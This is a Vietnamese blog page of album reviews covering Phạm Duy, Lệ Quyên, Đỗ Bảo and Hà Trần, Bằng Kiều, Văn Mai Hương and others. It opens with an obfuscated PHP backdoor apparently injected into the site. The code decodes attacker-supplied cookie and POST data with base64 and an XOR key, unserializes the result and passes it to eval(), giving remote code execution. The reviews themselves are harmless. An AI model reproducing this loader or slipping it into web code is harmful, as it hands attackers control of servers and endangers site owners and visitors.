$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> review – Page 3 – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Tag: review (page 3 of 4)

Lá Diêu Bông – Thông Điệp Mùa Xuân – Phạm Duy 1985

Nhân đọc lại “Bên kia Sông Đuống” – một trong những bài thơ hiếm hoi học ở bậc phổ thông trung học mà tới giờ mình vẫn còn nhớ lời, mình nghĩ tới album này, loay hoay tìm nghe lại và viết vài dòng.

Thơ Hoàng Cầm – oanh vàng Kinh Bắc, rất hay, nhưng chả hiểu sao không mấy nhạc sĩ đem mấy bài thơ của ông vào nhạc. Mình đoán là vì khó, thơ Hoàng Cầm dễ đọc, dễ hiểu với thi từ và ý thơ đơn giản, nhưng để chuyển tải cái mộc mạc giản đơn, nhẹ nhàng mà tinh tế ấy vào nhạc thì chắc khó. Có lẽ nhạc sĩ Phạm Duy là người hiếm hoi (hoặc duy nhất – correct me if i’m wrong) phổ thơ Hoàng Cầm.

Trong những cuốn hồi kí và các cuộc phỏng vấn của mình, Phạm Duy luôn khen ngợi và đánh giá Hoàng Cầm rất cao, từ nhân cách tới lãnh vực nghệ thuật. Phạm Duy thân với Hoàng Cầm từ hồi trên chiến khu Cao – Bắc – Lạng. Chính Phạm Duy cũng thừa nhận rằng ông chịu ảnh hưởng tình yêu nước từ Hoàng Cầm rất nhiều. Phạm Duy đã từng phổ thơ khá nhiều bài của thi sĩ Hoàng Cầm và được đông đảo thính giả yêu mến.

Lại nói về album này, album này được phát hành ở hải ngoại vào năm 1985, chủ yếu là các ca khúc của Hoàng Cầm, có xen vào vài ca khúc khác, như bài “Màu thời gian” thơ Đoàn Phú Tứ, hay hai bài sặc mùi ‘chống Cộng’ do Phạm Duy viết. Album do nhạc sĩ hòa âm phối khí được xem như là hay nhất hải ngoại, cũng là con ruột của Phạm Duy thực hiện. Ca sĩ trình bày bài hát này là Thái Hiền, cũng là con gái của Phạm Duy.

Đã nhắc đến thì lại phải nói tiếp, trong số các người con hay những người có liên quan trong đại gia đình Phạm Duy, thì Thái Hiền không được biết đến nhiều lắm. Ở làng nhạc hải ngoại, cái tên Thái Hiền cũng không nổi bật. Nhưng điều đó không có nghĩa Thái Hiền hát không hay. Mình thích Thái Hiền còn hơn thích cả Ý Lan. Thái Hiền sống khá nội tâm, khép kín, cô không đi show hay trình diễn ở các chương trình nhạc hội của Paris By Night hay Asia. Cô không có cái giọng kim cao đến chói xoáy thẳng vào óc người nghe như người dì là Thái Thanh, không có cái vẻ yểu điệu gió thổi mây bay như của người em họ Ý Lan, giọng của Thái Hiền nhẹ nhàng và thanh khiết hệt như tính cách của cô.

Lấy như bài “Lá diêu bông”. Bài này hát thành công nhất là Ý Lan, hát đúng cái chất ỡm ờ nửa khiêu khích nửa e thẹn của người con gái kinh Bắc. Lúc nghe Ý Lan chỉ cứ nghĩ ngoài Ý Lan ra không ai trình bày đạt hơn được nữa. Nghe lại Thái Hiền mới thấy khác. Dĩ nhiên cả 2 version đều mười phân vẹn mười. Ở Thái Hiền không đạt được chất ‘lẳng’ như khi Ý Lan hát, nhưng có cảm giác mộc mạc và nhẹ nhàng, như đúng một câu chuyện say nắng của những chàng trai nông thôn ngày đó – yêu rồi phải quên, giản đơn như vốn nó là thế.

Hay như bài “Cỗ bài tam cúc” (Cây tam cúc – Hoàng Cầm), tới câu:

Em đừng lớn nữa chị đừng đi

Nghe Thái Hiền hát yêu không chịu nổi.

Nếu có điểm mình không vừa ý với album này thì đó là nhạc sĩ Phạm Duy nói quá nhiều, nếu bỏ bớt đi những lời ông tỉ tê nói, cùng 2 bài ‘chống Cộng’ thêm vào cuối album thì có thể với mình sẽ là album tuyệt vời. Thôi đành chép miệng vừa chuyển bài thì kéo cho forward khúc đầu vậy. Giọng Thái Hiền quá hay, đang nghe lại lần nữa tới câu

Trăm năm tình cũ lìa không hận
Thà khép mày hoa, thiếp phụ chàng

Lại không nhịn nổi mà vỗ đùi đánh đét một cái.

À, nghe thì nên nghe thêm bài “Bên kia sông Đuống” mà Phạm Duy phổ thơ năm 2010, do Mỹ Linh trình bày, để hoàn toàn đắm chìm vào không khí nhạc Phạm Duy – thơ Hoàng Cầm trọn vẹn nhất…

Lệ Quyên – Con tim dại khờ

‘Con tim dại khờ’ là album mới nhất của Lệ Quyên, được tung ra cùng lúc với ‘Dòng thời gian’ mà mình từng viết nhăng viết cuội ở đây.

Đầu tiên, mình chỉ muốn nói là Lệ Quyên ơi sao chị lại đẹp và gợi cảm thế. Kế đó, mới lại-là những dòng viết linh tinh sau khi nghe album này.

Album này được tung ra cùng lúc với ‘Dòng thời gian’, nhưng khác chỗ là nếu như album kia toàn những bài nhạc tình kinh điển trong dòng chảy âm nhạc Việt Nam gần 1 thế kỉ nay, thì ‘Con tim dại khờ’ lại là album nhạc trẻ, rất trẻ. Cái khó cho cả chị Lệ Quyên và người nghe, là nghe 2 album cùng lúc, người nghe cảm thấy giọng chị rất giống nhau ở cả 2 album (vì chị làm cùng lúc). Đó cũng có nghĩa là chị không hát đạt hoàn hảo 1 album nào cả.

Điều khác biệt lớn nhất là hát nhạc trẻ hiện tại, cái khoảng-cách-tới-hoàn-hảo xa xa cũng được, người nghe sẽ dễ tính bỏ qua. Nhưng với những bài mà đã đi theo dòng thời gian, đi vào trong lòng người với 1 giọng ca bất hủ nào đó, thì chỉ cần kém xíu là người nghe nhận ra ngay. Đó là lí do mình đánh giá ‘Dòng thời gian’ có thể được xem như là một thất bại. May thay, chị có album ‘Con tim dại khờ’ này gỡ gạc lại phần nào. Đúng ra mà nói ‘Con tim dại khờ’ không thật sự hay như các album trước của Lệ Quyên. Nhưng với đối tượng chính của album này – các bạn khá trẻ, thì là vừa đủ. Vì thật ra cũng kiếm được mấy ca sĩ trẻ ở thời điểm hiện tại hát chững chạc thế này đâu?

Tuy nhiên, như mình, mình luôn mong chờ ở một Lệ Quyên có thể trở thành diva, hay ít nhất là nữ hoàng nhạc Pop Việt trong tương lai, thì album này vẫn chỉ dưới tiêu chuẩn của mình, thậm chí khá xa. Các bài hát trong album nhạt nhòa, dù trong đó toàn những bài mà nếu chị hát tốt hoàn toàn có thể đánh dấu tên tuổi.

Dòng nhạc hải ngoại có một Minh Tuyết khá xứng với danh hiệu nữ hoàng nhạc Pop Việt (dĩ nhiên ở cộng đồng hải ngoại thôi), gần đây Thúy Nga cũng có Lam Anh rất triển vọng. Bài hát thời gian này được xem như ‘độc quyền’ (ý chỉ chưa ai hát hay hơn) của Minh Tuyết: ‘Nếu em được chọn lựa’, trong album mới nhất của mình Lam Anh có hát lại, và ở album này, Lệ Quyên cũng trình bày lại. Theo mong đợi của mình, Lệ Quyên sẽ trình bày bản này hay hơn cả Minh Tuyết ở bản gốc, hoặc ít ra cũng phải hay hơn Lam Anh, nhưng mình thất vọng. Bản này phối rất hay, khúc mở đầu giọng Lệ Quyên hát cảm xúc và rất đạt, từ biểu cảm đến cách nhả chữ đặc trưng của chị, nhưng những khúc cao trào lại thua hẳn Minh Tuyết và Lam Anh.

Dĩ nhiên, nhắc lại, với những bạn trẻ – đối tượng chính của album, thì album này là hay vừa đủ, so với mặt bằng các album trên thị trường hiện tại, nhưng với 1 người yêu thích và chờ đợi sự tỏa sáng như-dĩ-nên-thế của chị ở mình, thì mình cảm thấy đây là chưa đủ.

Mình chỉ hi vọng Lệ Quyên trở lại là chị trước đây, trước khi quá chạy theo thị trường, chỉ mong thấy một Lệ Quyên – chỉ – hát – mà – thôi.

Quái Vật Tí Hon – Đường về

Đàn bà kể chuyện cổ tích, đàn ông nói về cuộc đời…

Hầu như những câu chuyện âm nhạc đẹp nhất đều được viết bởi đàn ông. Trần Tiến kể về đời sống, Quốc Bảo viết chuyện tình yêu, Trịnh Công Sơn nói về cuộc đời và thân phận. Còn Quái Vật Tí Hon, họ nói về trải nghiệm.

Tôi nghe “Đường Về” của Quái Vật Tí Hon từ rất lâu rồi, đợt đó những bài hát của họ là một trong những vị nhạc mà tôi nhấp trong suốt quãng đường lái xe rong ruổi xuyên bang của mình. Nhạc của Quái Vật Tí Hon là những câu chuyện kể về trải nghiệm cuộc đời, những điều tưởng như là của cá nhân riêng họ. Chợt đến một ngày, nghĩ ra, tìm nghe, và thấy lòng buồn se sắt lại, vì đột nhiên thấy câu chuyện đó như là của riêng mình.

Vì đàn ông, chung quy, dù đi bao con đường, cũng vẫn có cùng một vài loại trải nghiệm giống nhau. Như hôm nay, trên đường tan làm kẹt xe, thấy mệt mỏi vô cùng, nghe Hải Bột hát “về nhấc chén say ta vứt đời” thấy chính mình buột miệng: “vứt mẹ nó, về thôi”. Nhạc Quái Vật Tí Hon dễ nghe mà lại khó cảm, vì không ai bảo ai cảm được trải nghiệm. Những nét buồn, những vị đắng của trải nghiệm, phải đích thân trải qua rồi mới biết.

Vì sự mơ mộng làm nên đàn bà, còn trải nghiệm tạo thành tính cách của một người đàn ông…

Kẻ thù ta là đời
Bạn của ta là trời
Đêm nay buông trời ôm đất…

Lệ Quyên – Dòng thời gian

Trong các ca sĩ trẻ Việt Nam vào thời điểm hiện tại, Lệ Quyên được xem như là khuôn mặt sáng giá nhất, kể cả về nghệ thuật lẫn độ nổi tiếng và hút fan. Ngoài giọng hát truyền cảm và đầy nội tâm, Lệ Quyên còn được phú cho một vẻ duyên dáng rất yêu, giọng nói ngọt ngào. Tóm lại là ngay từ những album đầu tiên của Lệ Quyên, mình đã thích ngay chị

Đỗ Bảo – Chuyện của mặt trời, chuyện của chúng ta

Ở Việt Nam những năm hiện tại, có hai nhạc sĩ rất tài ba trong việc dùng nhạc thay thoại, đó là Trần Tiến và Đỗ Bảo. Cảnh trong nhạc Trần Tiến là một tay giang hồ phiêu du nào đó, mỏi mệt ngồi xuống kể chuyện xứ đồng quê; còn nhạc Đỗ Bảo như trong những bộ phim Hồng Kông thập kỉ 90, mọi thứ diễn ra chầm chậm, uể oải, tưởng tất cả sẽ trôi qua vô vị nhưng trong đó lại có vài điểm nhấn nhẹ đầy xúc cảm. Cái khó của nhạc sĩ khi viết nhạc như chuyện kể, đó là làm sao để người nghe không dễ chán, hay tài hơn nữa là để họ tưởng như câu chuyện đó được viết cho riêng mình (vì phỏng trên đời mấy ai thích ngồi nghe câu chuyện người khác đâu?)

Tôi, vào những ngày của tháng 6 nơi thời gian gần như dừng lại – không phải vì cái uể oải của mùa hè, mà là sự lười biếng từ trong tâm. Em đã xa tôi, và tôi chuẩn bị xa Việt Nam, đã từng nghĩ “Bài ca tháng sáu” của Đỗ Bảo như là một câu chuyện kể dành riêng cho mình. Người ta thích nhạc của một ai đó, có lẽ chỉ từ những sự đồng cảm nhỏ như thế thôi.

“Cánh cung” là câu chuyện kể kéo dài non một thập kỉ của Đỗ Bảo, mở đầu với album cùng tên vào năm 2004, và kết thúc bằng “Chuyện của mặt trời, chuyện của chúng ta” vừa phát hành gần đây. Khác với nhiều người, tôi có xu hướng xem những bài của Đỗ Bảo như những câu chuyện ngắn vụn vặt hơn là gắng tìm mối liên kết giữa chúng với nhau. Những câu chuyện vặt của Đỗ Bảo mười năm trước và hiện tại không khác nhiều: cũng vẫn cùng một lối dẫn, xoay quanh vài kiểu trình bày. Tôi biết nhiều người có lẽ giống tôi, mong album này, bởi vì nó là sản phẩm của Đỗ Bảo (ừ, và Hà Trần) hơn là mong đợi một sự gì đổi mới, cách tân trong âm nhạc khác lạ.

Ca từ trong nhạc Đỗ Bảo không nắn nót đến mức tưởng thêm hoặc bớt một từ cũng đều đánh rơi cái đẹp như những lời nhạc của Quốc Bảo. Quốc Bảo viết hoa mỹ, Đỗ Bảo viết thoại giản đơn. Nhạc của Đỗ Bảo dễ nghe hơn, nhưng lại khó thích hơn.

Khác với 2 album “Cánh cung” trước, toàn bộ bài hát trong album này đều do Hà Trần trình bày. Hà Trần tuyệt vời nhất là Hà Trần của những ngày đầu còn chập chững hát, nhưng đỉnh cao của chị lại là những album sau đó – những album dày đặc tự sự khó nghe. Có thể nói, trong số các giọng ca nữ gần đây, không ai có thể kể chuyện hay như Hà. Cũng nên nhắc lại rằng, album từng làm cho khán giả phát sốt, đưa tên tuổi chị lên hàng diva, cũng là một album đầy tính tự sự, và do Đỗ Bảo hòa âm phối khí.

“Chuyện của mặt trời, chuyện của chúng ta” không rối rắm, ma mị và đầy ám ảnh như “Nhật Thực” năm nào. Thậm chí, so với 2 album “Cánh cung” trước thì phông màu xám của nó còn nhạt hơn. Trong 2 album trước, các câu chuyện được kể qua sự trình bày của nhiều ca sĩ khác nhau, vì thế mang nhiều màu sắc khác nhau. Đỗ Bảo quyết định để một mình Hà Trần độc diễn trong album Cánh Cung cuối cùng này. Trong 4 diva Việt Nam, thì Hà Trần được xem như là người có giọng hát mỏng nhất. Tuy sau này được bù đắp rất nhiều bằng kĩ thuật thanh nhạc và phòng thu, nhưng ở vài chỗ, đặc điểm đó trong giọng của cô vẫn khẽ bộc lộ ra, không che giấu được. Điều đó khiến tôi hơi e ngại. Lại nghĩ vu vơ, Hà Trần của “Nhật Thực” có lẽ chỉ xuất hiện một lần, rồi thôi.

Hà Trần trình bày tất cả các ca khúc trong “Chuyện của mặt trời, chuyện của chúng ta” đều rất đạt và tròn trịa. Bảo tôi tìm một ca sĩ trình bày được tinh tế như Hà Trần trong album này thì có lẽ chịu, tôi không tìm được đâu. Nghe “Chuyện của mặt trời, chuyện của chúng ta”, có lúc thấy Hà ngô nghê “Hãy đưa tôi về bên anh nhé đôi giày lười”, khi thì dửng dưng lạnh lùng “Anh đâu là tiên phật, mà nhìn ra khoảng trống thấy được vạn vật”, khi thì chậm rãi nhẹ nhàng nhưng đến xót xa “yêu là bâng khuâng trước bóng em vụn vỡ, bóng em điệp trùng“ trong bài “Người câu bóng” (đây là bài mà tôi ưng không thể nào chịu được). Thiết tưởng việc chỉ có một ca sĩ trình bày xuyên suốt trong album vốn là một yếu điểm nhưng nếu thực hiện đúng, thì lại thành ra điểm nhấn đáng chú ý.

Đến thời điểm viết xong những dòng này, tôi đã nghe album được 3 lần. “Chuyện của mặt trời, chuyện của chúng ta” cũng giống những câu chuyện bên bàn ăn của ông, của ba, những câu chuyện nhàm chán bắt đầu bằng câu quen thuộc “ngày xưa đó, cái thời của ba đó, ba còn nhớ…”, lặp lại ngày qua ngày, nhưng dần dần những diễn biến đó, những chi tiết đó đi vào trí nhớ lúc nào chẳng hay. Một ngày nắng nóng nực và lười biếng nào đấy, tự nhiên lại khẽ vang lên “Tháng sáu nóng như đổ lửa. Cây sấu giả thả chiếc lá xanh” hay “Anh đã mơ về, ngôi nhà và những đứa trẻ”. Có lẽ, những ca khúc trong album này rồi cũng sẽ được nhớ đến như thế.

Màu xám nhạt và đơn điệu, không có nghĩa là màu xám không có nét đẹp. Vấn đề chỉ là, vào thời điểm nào, thì người ta thích cái thứ màu đó mà thôi…

Bằng Kiều & Trần Thu Hà – Đánh thức tầm xuân

Ngoài cửa sổ mưa rỉ rả nhưng mây trời trong vắt, nắng lại vàng chứa chan đột nhiên khiến tôi thừ người ra. Trời Texas làm tôi nhớ Sài Gòn – Sài Gòn của những ngày chợt mưa chợt nắng, nắng chưa tan mà mưa đã ào ạt tới. Ngồi nhìn đồng hồ, còn tận một tiếng nữa mới đến giờ đi xem phim – một mình, tôi chạy vào nhà bếp công ty, pha vội cho mình một li Mochaccino. Vừa tựa người bên cửa sổ nhìn mưa, nhấp cà phê, uể oải trả lời sếp: tao đang suy nghĩ về project, vừa với tay lật tung kho nhạc tìm một album nghe cho hợp, cuối cùng dừng ở album này.

Tôi không thích Bằng Kiều lắm, tôi cũng nghĩ “Đánh thức tầm xuân” không phải là album hay nhất của Hà Trần, nhưng tôi nghe trong album này có những điều rất riêng, của cả Bằng Kiều, của cả Hà Trần, của cả giọng hát hai người kết hợp – và đặc biệt hơn nữa, album này cũng là bước tiến quan trọng để góp phần khẳng định tên tuổi của Bằng Kiều, cũng như giúp Hà Trần tạo được tiếng vang lớn.

Giống như trong hai album trước với Mỹ Linh và Phương Thanh, Bằng Kiều cùng Hà Trần đã có bản song ca “Đánh thức tầm xuân” mà sau này vẫn chưa có cặp song ca nào hát hay đến mức đó (đâu gần đây, diva rất có duyên với nhạc Dương Thụ là Hồng Nhung có cùng Quang Dũng trình bày bài này, nhưng cũng chỉ dừng ở mức đạt), và bài “Về với anh” (Bảo Chấn sáng tác). Tuy nhiên, khác ở chỗ album này những bài còn lại lần lượt là các khúc hát solo của Bằng Kiều và Hà Trần.

Bằng Kiều thuở đó giọng vẫn cao nhưng không được anh cố tình đẩy lên mức cao vút hết sức khó chịu như cách anh vẫn khoe giọng trong hầu hết các ca khúc của anh vài năm trở lại đây. Bằng Kiều trong các ca khúc, dù hát song ca, hay hát đơn, vẫn là giọng kĩ thuật nhưng không đến mức quá phô trương. Trong album này còn có bài do Bằng Kiều sáng tác “Hè muộn” – một trong những bài hát để đời và gắn với tên tuổi của Bằng Kiều. Thật ra, nói ngoài lề, tôi thấy anh Kiều hát bài “Cửa sổ mùa đông” hay cực, chả hiểu sao không được nhiều người để ý đến. Có lẽ họ chuộng version của Hồng Nhung hơn. Cứ nghe tới khúc anh Kiều thủ thỉ “để rồi mãi nỗi buồn ngày mưa”, và “mưa bay đi và câu tình ca vẫn chỉ buồn như thế”, nhìn ra cửa sổ lại thấy tê lòng.

Như đã nói, các bài của Hà Trần trong album này không phải những bài tôi (và cũng như nhiều người) đánh giá là hay nhất, nhưng là mốc điểm quan trọng với Hà Trần. Đây là lúc Hà Trần bước chân vào làng ca hát chuyên nghiệp sau khi đã đạt vô vàn giải thưởng ca hát khác nhau. Nghe hai bài Hà Trần hát chung với Bằng Kiều trong album này thì thấy, cô không khoe giọng của mình một cách mạnh mẽ như Mỹ Linh hay Phương Thanh khi hát cùng Bằng Kiều, mà chọn cách hát thật giản dị, nhẹ nhàng, lúc như hòa quyện vào, lúc lại vượt trội lên – nhưng chỉ hơi hơi vừa đủ. Đến những bài hát đơn của cô trong album này cũng thế. Trừ bài “Tóc gió thôi bay” ra, sau này không có bài nào hay đặc biệt đến mức trở thành thương hiệu của riêng cô, nhưng tất cả các bài cô hát đều rất chỉn chu, mẫu mực. Cô duyên những chỗ cần duyên, nhẹ nhàng những chỗ nhẹ nhàng, phiêu những chỗ nên phiêu. Một khởi đầu rất đẹp cho một ca sĩ – không có ngoại hình bắt mắt hay giọng hát đặc biệt như cô.

Một album không xuất sắc, nhưng là một album quan trọng trong cuộc đời nghệ thuật của hai ngôi sao nhạc nhẹ đương đại Việt Nam. Một chút gì đó ngây ngô, một chút gì đó lãng đãng, chút giản dị, chút nồng say… tưởng thế là quá đủ cho một ngày mưa đầy nhớ thế này.

Văn Mai Hương – 18+

Khá trùng hợp ngay khi hôm qua mình vừa nghe mini album đầu tay của quán quân Giọng Hát Việt là Hương Tràm, thì hôm nay đã lại thấy có album của á quân Việt Nam Idol Văn Mai Hương trên zing mp3. Dù vô tình hay có ý, thì ít nhiều mình (hay người nghe khác) cũng có chút so sánh giữa hai giọng ca đã một phần khẳng định được tài năng nhưng còn khá trẻ này.

Cả Tràm lẫn Hương đều sở hữu giọng hát đầy nội lực, những giọng hát cuốn hút mà không cần kĩ thuật thanh nhạc rất nhiều, những giọng hát mà khi vừa cất lên đã có thể khiến người nghe xuýt xoa vì thích thú. Cả hai đều đi theo con đường khá ‘cơ bản’: đoạt giải trong các cuộc thi âm nhạc (truyền hình) có tiếng, đến phát hành single riêng, và rồi tung ra (mini) album. Chưa biết ê-kíp đứng sau Tràm là ai, nhưng ê-kíp của Hương khá bài bản, cả về truyền thông lẫn nghệ thuật.

Mình thích Văn Mai Hương hơn Uyên Linh, vì chất giọng trong trẻo nhưng đầy cá tính của cô bé, và vì cách cô bé hát, đẹp và sôi nổi như tuổi trẻ của cô. Mình không biết sao ê-kíp của Hương lại chọn cho cô bé đi khác cái phong cách dance và RnB vốn rất hợp và cuốn hút của cô trong ‘Nếu như anh đến’. Theo mình đó là một bước đi khá vội.

Văn Mai Hương của “Mười tám +”, đúng như tên album và định hướng của Huy Tuấn, là một Văn Mai Hương đầy chín chắn. Đúng là tông nhạc của album vẫn rất hiện đại, sạch sẽ và tươi mới, nhưng mình vẫn thấy nhớ nhớ Hương của thời mới đoạt á quân Idol hơn. Người nghệ sĩ là luôn phải làm mới mình, cũng có thể Hương vẫn đang gắng định hình phong cách phù hợp, nhưng thật ra Hương vẫn chưa ‘xài-hết’ cái tiềm năng của sự kết hợp ‘tuổi trẻ – sôi nổi’ mà.

Quay lại “Mười tám +” của Văn Mai Hương đẹp, đẹp vì những album do Huy Tuấn sản xuất có album nào không đẹp? Và Huy Tuấn có quá đủ kinh nghiệm làm album đầy tính chuyên môn nghệ thuật nhưng vẫn đảm bảo có sức hút trên thị trường. Nhưng Văn Mai Hương chưa đạt đến tầm của Mỹ Linh, nên cái đẹp của “Mười tám +” là một cái đẹp rất tròn trịa, đến mức thiếu điểm nhấn. Giữa những bài ballad nhẹ nhàng, Văn Mai Hương có xen vào một vài bài nhạc sôi động, như bài Tango lúc kết thúc, nhưng đó vẫn chưa hoàn toàn tạo thành điểm nhấn. Như mình đã nói ở trên, các ca khúc được xem là chủ lực trong album như ‘Chậm lại một phút’, ‘Riêng mình anh thôi’ hay ‘Giấc mơ thức tỉnh’ vẫn còn thiếu gì đó để người ta nghe mãi, nhắc mãi và sẽ nhớ, ít nhất là như ‘Nếu như anh đến’ ngày nào.

Hoàn toàn rất tốt cho album của một ca sĩ trẻ, Văn Mai Hương còn có rất nhiều thời gian. Hương hoàn toàn đủ khả năng để đạt đến thành công như Mỹ Tâm hiện tại, nhưng để phát huy hoàn toàn nội lực của cô, có thể tiến xa hơn nữa, thì còn rất nhiều yếu tố. Hi vọng vào những điều tốt đẹp nhất trong tương lai cho cô bé :”).

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.